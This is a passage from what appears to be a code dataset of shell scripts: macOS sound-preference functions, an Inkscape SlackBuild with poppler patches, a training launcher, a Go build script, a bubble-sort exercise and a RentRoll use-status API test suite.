  defaults write com.apple.systemsound com.apple.sound.uiaudio.enabled -int $on_int
  defaults write com.apple.finder FinderSounds -bool $on_bool
  defaults write com.apple.systemsound com.apple.sound.beep.volume -float $volume
}
# Toggle the "Speakable Items" speech-recognition preference.
function osx_sound_speech_recognition {
  local state="false"
  [[ "$1" == "enabled" ]] && state="true"
  sudo defaults write com.apple.speech.recognition.AppleSpeechRecognition.prefs StartSpeakableItems -bool $state
}
# Toggle the text-to-speech preferences and clear any scheduled time
# announcements.
function osx_sound_text_to_speech {
  local state="false"
  [[ "$1" == "enabled" ]] && state="true"
  local key
  for key in TalkingAlertsSpeakTextFlag SpokenNotificationAppActivationFlag SpokenUIUseSpeakingHotKeyFlag; do
    sudo defaults write com.apple.speech.synthesis.general.prefs "$key" -bool $state
  done
  sudo sh -c "defaults delete com.apple.speech.synthesis.general.prefs TimeAnnouncementPrefs 2> /dev/null"
}
# Load ("enabled") or unload the VoiceOver-related launch agents.
function osx_sound_voiceover {
  local action="unload"
  [[ "$1" == "enabled" ]] && action="load"
  local agent
  for agent in com.apple.VoiceOver com.apple.ScreenReaderUIServer com.apple.scrod; do
    sudo sh -c "launchctl $action -w /System/Library/LaunchAgents/${agent}.plist 2> /dev/null"
  done
}
| true
|
9608c1a412c5e0a6f1f0147e1deb77270e5ec84d
|
Shell
|
Obliteron/tde-slackbuilds
|
/Misc/inkscape/inkscape.SlackBuild
|
UTF-8
| 7,604
| 3.0625
| 3
|
[] |
no_license
|
#!/bin/sh
# Generated by Alien's SlackBuild Toolkit: http://slackware.com/~alien/AST
# Copyright 2009, 2010, 2011, 2012, 2013, 2014, 2015 Eric Hameleers, Eindhoven, Netherlands
# Copyright 2015-2017 Thorn Inurcide
# Copyright 2015-2017 tde-slackbuilds project on GitHub
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software for
# any purpose with or without fee is hereby granted, provided that
# the above copyright notice and this permission notice appear in all
# copies.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE AUTHORS AND COPYRIGHT HOLDERS AND THEIR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
PRGNAM=inkscape
VERSION=${VERSION:-0.92.3}
BUILD=${BUILD:-1}
SRCURL="https://media.inkscape.org/dl/resources/file/inkscape-$VERSION.tar.bz2"
# The *_fn helpers and variables like LIBDIRSUFFIX/I18N/TMP_BUILD are
# presumably defined by the sourced common script -- verify in get-source.sh.
source ../../get-source.sh
getsource_fn
untar_fn
## install to .../lib64 on 64-bit system
[[ -d /lib64 ]] && \
{ ## set RPATH
sed -i "s|ORIGIN/../lib/inkscape|ORIGIN/../lib$LIBDIRSUFFIX/inkscape|" CMakeLists.txt
## set output directory
sed -i "s|/lib |/lib$LIBDIRSUFFIX |" CMakeLists.txt
## for dynamic lib
sed -i "s|lib/inkscape|lib$LIBDIRSUFFIX/inkscape|" src/CMakeLists.txt
## for static libs
sed -i "s|lib/inkscape|lib$LIBDIRSUFFIX/inkscape|" CMakeScripts/HelperMacros.cmake
}
## only build for required locales
## Strategy: move the wanted files for each locale in $I18N into TEMP_DIR,
## delete everything else, then move the wanted files back. The trailing
## '|| true' makes the whole pruning block best-effort.
{
## .. for po/LINGUAS
LOCALES=$(cat po/LINGUAS)
rm po/LINGUAS
for locale in $I18N
do
[[ $LOCALES == *$locale* ]] && \
echo $locale >> po/LINGUAS
done
## set up a directory to store the required locale files temporarily
TEMP_DIR=$TMP_BUILD/tmp-$PRGNAM/loc_tmp
mkdir $TEMP_DIR
## .. for READMEs
for locale in $I18N
do
mv README.$locale.txt $TEMP_DIR
done
rm README.*.txt
mv $TEMP_DIR/* .
RM_LIST=$(ls -1 README*)
## .. for keys.*.html
for locale in $I18N
do
mv doc/keys.$locale.html $TEMP_DIR
done
rm doc/keys.*.html
mv $TEMP_DIR/* doc/
KEYS_LIST=$(ls -1 doc/keys.*)
## .. for translations
for locale in $I18N
do
mv po/$locale.po $TEMP_DIR
done
rm -rf po/*.po
mv $TEMP_DIR/* po/
## .. for tutorials
for locale in $I18N
do
mv share/tutorials/*.$locale.* $TEMP_DIR
done
rm share/tutorials/*.*.*
mv $TEMP_DIR/* share/tutorials/
## .. for templates
for locale in $I18N
do
mv share/templates/*.$locale.* $TEMP_DIR
done
rm share/templates/*.*.*
mv $TEMP_DIR/* share/templates/
} || true
## https://gitlab.com/inkscape/inkscape/commit/a600c6438fef2f4c06f9a4a7d933d99fb054a973
## Fix compilation with poppler 0.64
## NOTE(review): the '| while read line; do patch -p0; done' idiom lets the
## first 'read' consume one line and hands the remaining stream to patch's
## stdin; this is fragile -- confirm the patches still apply cleanly.
echo $'--- src/extension/internal/pdfinput/pdf-parser.cpp
+++ src/extension/internal/pdfinput/pdf-parser.cpp
@@ -2585,1 +2585,1 @@
-void PdfParser::doShowText(GooString *s) {
+void PdfParser::doShowText(const GooString *s) {
@@ -2604,1 +2604,1 @@
-  builder->beginString(state, s);
+  builder->beginString(state);
@@ -2634,1 +2634,1 @@
-  p = s->getCString();
+  p = g_strdup(s->getCString());
@@ -2689,1 +2689,1 @@
-  p = s->getCString();
+  p = g_strdup(s->getCString());
@@ -2735,1 +2735,1 @@
-  char *name = args[0].getName();
+  char *name = g_strdup(args[0].getName());
--- src/extension/internal/pdfinput/pdf-parser.h
+++ src/extension/internal/pdfinput/pdf-parser.h
@@ -290,1 +290,1 @@
-  void doShowText(GooString *s);
+  void doShowText(const GooString *s);
--- src/extension/internal/pdfinput/svg-builder.cpp
+++ src/extension/internal/pdfinput/svg-builder.cpp
@@ -1023,1 +1023,1 @@
-  _font_specification = font->getName()->getCString();
+  _font_specification = g_strdup(font->getName()->getCString());
@@ -1364,1 +1364,1 @@
-void SvgBuilder::beginString(GfxState *state, GooString * /*s*/) {
+void SvgBuilder::beginString(GfxState *state) {
--- src/extension/internal/pdfinput/svg-builder.h
+++ src/extension/internal/pdfinput/svg-builder.h
@@ -32,1 +32,0 @@
-class GooString;
@@ -139,1 +138,1 @@
-  void beginString(GfxState *state, GooString *s);
+  void beginString(GfxState *state);
' | while read line
do
patch -p0
done
## https://gitlab.com/inkscape/inkscape/commit/10e8ae0ff522d3a9caeed9a7f137cdfd795ba0a3
## Fix compilation with poppler 0.65.0
## replace unused includes with one that is actually used
echo $'--- src/extension/internal/pdfinput/pdf-parser.cpp
+++ src/extension/internal/pdfinput/pdf-parser.cpp
@@ -40,2 +40,1 @@
-#include "goo/GooTimer.h"
-#include "goo/GooHash.h"
+#include "goo/GooString.h"
' | while read line
do
patch -p0
done
chown_fn
listdocs_fn
cd_builddir_fn
## default options have been pulled from CMakeLists.txt
cmake \
-DCMAKE_C_FLAGS:STRING="$SLKCFLAGS" \
-DCMAKE_CXX_FLAGS:STRING="$SLKCFLAGS" \
-DCMAKE_C_FLAGS_RELEASE:STRING="$SLKCFLAGS" \
-DCMAKE_CXX_FLAGS_RELEASE:STRING="$SLKCFLAGS" \
-DCMAKE_C_COMPILER=$COMPILER \
-DCMAKE_CXX_COMPILER=$COMPILER_CXX \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_INSTALL_PREFIX=/usr/local \
-DWITH_NLS="ON" \
-DWITH_DBUS="OFF" \
-DENABLE_LCMS="ON" \
-DWITH_GNOME_VFS="ON" \
-DWITH_SVG2="ON" \
-DWITH_LPETOOL="OFF" \
-DWITH_INKJAR="ON" \
-DWITH_OPENMP="ON" \
-DWITH_PROFILING="OFF" \
-DENABLE_POPPLER="ON" \
-DENABLE_POPPLER_CAIRO="ON" \
-DWITH_IMAGE_MAGICK="ON" \
-DWITH_LIBCDR="ON" \
-DWITH_LIBVISIO="ON" \
-DWITH_LIBWPG="ON" \
-DWITH_GTK3_EXPERIMENTAL="OFF" \
-DENABLE_BINRELOC="OFF" \
..
make_fn
## only package man pages for required locales
## (same temp-dir shuffle as the source-tree locale pruning; best effort)
{ for locale in $I18N
do
mv $PKG/usr/local/share/man/man1/inkscape.$locale.1 $TEMP_DIR
done
rm $PKG/usr/local/share/man/man1/inkscape.*.1
mv $TEMP_DIR/* $PKG/usr/local/share/man/man1/
} || true
installdocs_fn
#mangzip_fn
strip_fn
mkdir_install_fn
## Write the package description (slack-desc) into the package tree.
echo "
# HOW TO EDIT THIS FILE:
# The 'handy ruler' below makes it easier to edit a package description. Line
# up the first '|' above the ':' following the base package name, and the '|' on
# the right side marks the last column you can put a character in. You must make
# exactly 11 lines for the formatting to be correct. It's also customary to
# leave one space after the ':'.
|-----handy-ruler------------------------------------------------------|
$PRGNAM: Inkscape (Open Source vector graphics editor)
$PRGNAM:
$PRGNAM: Inkscape is an Open Source vector graphics editor, with capabilities
$PRGNAM: similar to Illustrator, Freehand, CorelDraw, or Xara X using the W3C
$PRGNAM: standard Scalable Vector Graphics (SVG) file format.
$PRGNAM:
$PRGNAM:
$PRGNAM:
$PRGNAM: With language support for:
$PRGNAM: en $(echo $(cat ../po/LINGUAS))
$PRGNAM:
$PRGNAM: Homepage: http://www.inkscape.org/
" > $PKG/install/slack-desc
## doinst.sh: post-install hooks executed on the target system.
cat <<EOINS >> $PKG/install/doinst.sh
# Update the desktop database:
if [ -x usr/bin/update-desktop-database ]; then
chroot . /usr/bin/update-desktop-database /usr/local/share/applications > /dev/null 2>&1
fi
# Update hicolor theme cache:
if [ -d usr/share/icons/hicolor ]; then
if [ -x /usr/bin/gtk-update-icon-cache ]; then
chroot . /usr/bin/gtk-update-icon-cache -f -t /usr/local/share/icons/hicolor 1> /dev/null 2> /dev/null
fi
fi
EOINS
makepkg_fn
| true
|
414cee55cd71e3d16f273dc0973286e1335e88cc
|
Shell
|
Vanova/voicemap
|
/experiments/runner.sh
|
UTF-8
| 312
| 2.625
| 3
|
[] |
no_license
|
#!/bin/bash
# Launch siamese-network training, logging stdout to a timestamped file.
export PYTHONPATH="$(pwd)/../:$PYTHONPATH"
source activate ai3

model=siamese
log_dir="../logs/$(date "+%d_%b_%Y")"
log_file="$log_dir/${model}_$(date "+%H_%M_%S").log"

# -p: do not fail (or print an error) when today's directory already exists.
mkdir -p "$log_dir"
echo "Log to: $log_file"

#python -u ./train_sre_siamese.py > ${log_file}
python -u ./train_wav_siamese.py > "$log_file"
| true
|
cc97c69c1e39c115c85e3c8cc2e4fc52793bf562
|
Shell
|
ytsworld/greenhouse-client
|
/scripts/build.sh
|
UTF-8
| 356
| 2.84375
| 3
|
[] |
no_license
|
#! /bin/bash
set -e

# The build has to run on a raspberry device as cross compiling does not
# work for libraries that use "C".
cd /tmp/greenhouse-client

bin="./greenhouse-client"
# Clean up the previously built binary if one exists.
if [ -e "$bin" ]; then
  rm -f "$bin"
fi

go get
go build -o greenhouse-client ./cmd
chmod +x greenhouse-client
echo Build was successful
| true
|
3fb76cd9464e6cf45992ea935f1ae4409859de35
|
Shell
|
AditiPawar24/boot-camp-shell-scripting
|
/Assignment4/ExtendArray.sh
|
UTF-8
| 541
| 3.390625
| 3
|
[] |
no_license
|
#!/bin/bash
# Fill an array with 10 random numbers (99-198) and print it before and
# after sorting.
# Fixed: the original had invalid assignments ('${#Array[@]}=$1',
# '${Array[j]=$temp;'), passed the array through broken arithmetic
# expansion, and lost the sorted result in a subshell -- it could not sort.

# isSort: bubble-sorts its arguments in ascending order and echoes the
# sorted list, space-separated, on stdout.
function isSort()
{
  local arr=("$@")
  local n=${#arr[@]}
  local i j temp
  for ((i = 0; i <= n - 2; i++))
  do
    for ((j = i + 1; j <= n - 1; j++))
    do
      if [[ ${arr[i]} -gt ${arr[j]} ]]
      then
        temp=${arr[i]}
        arr[i]=${arr[j]}
        arr[j]=$temp
      fi
    done
  done
  echo "${arr[@]}"
}

MAXCOUNT=10
COUNT=1
while [ "$COUNT" -le $MAXCOUNT ]
do
  Array[$COUNT]=$(( (RANDOM%100) + 99))
  let "COUNT += 1"
done
echo "${Array[@]}"
result="$( isSort "${Array[@]}" )"
echo "$result"
| true
|
c841fc1fb2f1e430011fb3a62297b45738b49958
|
Shell
|
sudip-aubergine/rentroll
|
/test/rus/functest.sh
|
UTF-8
| 13,899
| 3.0625
| 3
|
[] |
no_license
|
#!/bin/bash
# Functional tests for Rentable Use Status. Helper functions used below
# (dojsonPOST, encodeRequest, start/stopRentRollServer, logcheck) are
# presumably defined in share/base.sh, sourced below -- confirm there.
TESTHOME=..
SRCTOP=${TESTHOME}/..
TESTNAME="RentableUseStatus"
TESTSUMMARY="Test Rentable Use Status code"
DBGENDIR=${SRCTOP}/tools/dbgen
CREATENEWDB=0
RRBIN="${SRCTOP}/tmp/rentroll"
CATRML="${SRCTOP}/tools/catrml/catrml"
#SINGLETEST="" # This runs all the tests
source ${TESTHOME}/share/base.sh
echo "STARTING RENTROLL SERVER"
RENTROLLSERVERAUTH="-noauth"
# RENTROLLSERVERNOW="-testDtNow 10/24/2018"
#------------------------------------------------------------------------------
# TEST a
#
# Validate that the search query returns the proper data
#
# Scenario:
#
# The database in xa should have many use status fields. Triplets of
# the form housekeeping, ready, in-service.
#
#
# Expected Results:
# 1. Search for UseStatus on rentable 4 and make sure that the data
# returned matches the patterns we expect.
#------------------------------------------------------------------------------
TFILES="a"
STEP=0
if [ "${SINGLETEST}${TFILES}" = "${TFILES}" -o "${SINGLETEST}${TFILES}" = "${TFILES}${TFILES}" ]; then
stopRentRollServer
# Load the scenario database for this test, then restart the server on it.
mysql --no-defaults rentroll < x${TFILES}.sql
startRentRollServer
# URL-encoded JSON search request (pre-encoded here instead of encodeRequest).
echo "%7B%22cmd%22%3A%22get%22%2C%22selected%22%3A%5B%5D%2C%22limit%22%3A100%2C%22offset%22%3A0%7D" > request
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/4" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
fi
#------------------------------------------------------------------------------
# TEST c
#
# Error that came up in UI testing. Overlapping of same type should be merged.
#
# Scenario:
#
# Existing db has a use status 4/1/2019 - 7/31/2019 in Ready State. It also
# has a record from 7/31/2019 to 12/31/9999 in Ready state. If we extend
# the latter record 1 or more days forward it should merge the two records.
# Similarly if we extend the former 1 day or more earlier, it should merge the
# two.
#
# Expected Results:
# see detailed comments below. Each case refers to an area in the source
# code that it should hit. If there's anything wrong, we'll know right
# where to go in the source to fix it.
#
#------------------------------------------------------------------------------
TFILES="c"
STEP=0
if [ "${SINGLETEST}${TFILES}" = "${TFILES}" -o "${SINGLETEST}${TFILES}" = "${TFILES}${TFILES}" ]; then
stopRentRollServer
# Reload the scenario database for TEST c, then restart the server on it.
mysql --no-defaults rentroll < x${TFILES}.sql
startRentRollServer
#-----------------------------------
# INITIAL RENTABLE USE STATUS
# Use DtStart DtStop
# ----------------------------
# 0 08/01/2019 - 12/31/9999
# 0 04/01/2019 - 08/01/2019
# 4 03/01/2019 04/01/2019
# 0 01/01/2018 03/01/2019
# Total Records: 4
#-----------------------------------
#--------------------------------------------------
# SetRentableUseStatus - Case 1a
# Note: EDI in effect, DtStop expressed as "through 8/31/2019"
# SetStatus 0 4/1/2019 - 9/1/2019
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 04/01/2019 - 12/31/9999
# 4 03/01/2019 04/01/2019
# 0 01/01/2018 03/01/2019
# Total Records: 3
# c0,c1
#--------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"BID":1,"BUD":"REX","RID":1,"UseStatus":0,"DtStart":"4/1/2019","DtStop":"8/31/2019","Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#--------------------------------------------------
# SetRentableUseStatus - Case 1c
# SetStatus 3 4/1/2019 - 9/1/2019
# Note: EDI in effect, DtStop expressed as "through 8/31/2019"
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 09/01/2019 - 12/31/9999
# 3 04/01/2019 - 09/01/2019
# 4 03/01/2019 04/01/2019
# 0 01/01/2018 03/01/2019
# Total Records: 4
# c3,c4
#--------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"BID":1,"BUD":"REX","RID":1,"UseStatus":3,"DtStart":"4/1/2019","DtStop":"8/31/2019","Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#-------------------------------------------------------
# SetRentableUseStatus - Case 1b
#-----------------------------------------------
# CASE 1a - rus contains b[0], match == false
#-----------------------------------------------
# b[0]: @@@@@@@@@@@@@@@@@@@@@
# rus: ############
# Result: @@@@@############@@@@
#----------------------------------------------------
# SetStatus 2 9/15/2019 - 9/22/2019
# Note: EDI in effect, DtStop expressed as "through 9/21/2019"
# Result needs to be:
# Use DtStart DtStop RSID
# ---------------------------- ----
# 0 09/22/2019 - 12/31/9999 15
# 2 09/15/2019 - 09/22/2019 16
# 0 09/01/2019 - 09/15/2019 10
# 3 04/01/2019 - 09/01/2019 14
# 4 03/01/2019 04/01/2019 11
# 0 01/01/2018 03/01/2019 5
# Total Records: 6
# c5,c6
#-------------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"UseStatus":2,"DtStart":"9/15/2019","DtStop":"9/21/2019","BID":1,"BUD":"REX","RID":1,"Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#-------------------------------------------------------
# SetRentableUseStatus - Case 1d
#-----------------------------------------------
# CASE 1d - rus prior to b[0], match == false
#-----------------------------------------------
# rus: @@@@@@@@@@@@
# b[0]: ##########
# Result: ####@@@@@@@@@@@@
#-----------------------------------------------
# SetStatus 1 (repair) 3/15/2019 - 9/1/2019
# Note: EDI in effect, DtStop expressed as "through 8/31/2019"
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 09/22/2019 - 12/31/9999
# 2 09/15/2019 - 09/22/2019
# 0 09/01/2019 - 09/15/2019
# 1 03/15/2019 - 09/01/2019
# 4 03/01/2018 03/15/2019
# 0 01/01/2018 03/01/2019
# Total Records: 6
# c7,c8
#-------------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":0,"UseStatus":1,"DtStart":"3/15/2019","DtStop":"8/31/2019","BID":1,"BUD":"REX","RID":1,"Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#-------------------------------------------------------
# SetRentableUseStatus - Case 2b
#-----------------------------------------------
# Case 2b
# neither match. Update both b[0] and b[1], add new rus
# b[0:1] @@@@@@@@@@************
# rus #######
# Result @@@@@@#######*********
#-----------------------------------------------
# SetStatus 3 8/1/2019 - 9/7/2019
# Note: EDI in effect, DtStop expressed as "through 9/6/2019"
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 09/22/2019 - 12/31/9999
# 2 09/15/2019 - 09/22/2019
# 0 09/01/2019 - 09/15/2019
# 3 08/01/2019 - 09/07/2019
# 1 03/15/2019 - 08/01/2019
# 4 03/01/2018 03/15/2019
# 0 01/01/2018 03/01/2019
# Total Records: 7
# c9,c10
#-------------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"UseStatus":3,"DtStart":"8/1/2019","DtStop":"9/6/2019","BID":1,"BUD":"REX","RID":1,"Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#-------------------------------------------------------
# SetRentableUseStatus - Case 2c
#-----------------------------------------------
# Case 2c
# merge rus and b[0], update b[1]
# b[0:1] @@@@@@@@@@************
# rus @@@@@@@
# Result @@@@@@@@@@@@@*********
#-----------------------------------------------
# SetStatus 1 7/1/2019 - 8/7/2019
# Note: EDI in effect, DtStop expressed as "through 8/6/2019"
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 09/22/2019 - 12/31/9999
# 2 09/15/2019 - 09/22/2019
# 0 09/01/2019 - 09/15/2019
# 3 08/07/2019 - 09/07/2019
# 1 03/15/2019 - 08/07/2019
# 4 03/01/2018 03/15/2019
# 0 01/01/2018 03/01/2019
# Total Records: 7
# c11,c12
#-------------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"UseStatus":1,"DtStart":"7/1/2019","DtStop":"8/6/2019","BID":1,"BUD":"REX","RID":1,"Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#-------------------------------------------------------
# SetRentableUseStatus - Case 2d
#-----------------------------------------------
# Case 2d
# merge rus and b[1], update b[0]
# b[0:1] @@@@@@@@@@************
# rus *******
# Result @@@@@@****************
#-----------------------------------------------
# SetStatus 3 (employee) 8/1/2019 - 8/10/2019
# Note: EDI in effect, DtStop expressed as "through 8/9/2019"
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 09/22/2019 - 12/31/9999
# 2 09/15/2019 - 09/22/2019
# 0 09/01/2019 - 09/15/2019
# 3 08/01/2019 - 09/07/2019
# 1 03/15/2019 - 08/01/2019
# 4 03/01/2018 03/15/2019
# 0 01/01/2018 03/01/2019
# Total Records: 7
# c13,c14
#-------------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"UseStatus":3,"DtStart":"8/1/2019","DtStop":"8/10/2019","BID":1,"BUD":"REX","RID":1,"Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#-------------------------------------------------------
# SetRentableUseStatus - Case 2a
#-----------------------------------------------
# Case 2a
# all are the same, merge them all into b[0], delete b[1]
# b[0:1] ********* ************
# rus *******
# Result **********************
#-----------------------------------------------
# SetStatus 0 (ready) 9/7/2019 - 9/30/2019
# Note: EDI in effect, DtStop expressed as "through 9/29/2019"
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 09/01/2019 - 12/31/9999
# 3 08/01/2019 - 09/07/2019
# 1 03/15/2019 - 08/01/2019
# 4 03/01/2018 03/15/2019
# 0 01/01/2018 03/01/2019
# Total Records: 7
#-------------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"UseStatus":0,"DtStart":"9/7/2019","DtStop":"9/29/2019","BID":1,"BUD":"REX","RID":1,"Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
fi
stopRentRollServer
echo "RENTROLL SERVER STOPPED"
# logcheck scans the server log for errors and sets the script's final status.
logcheck
exit 0
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.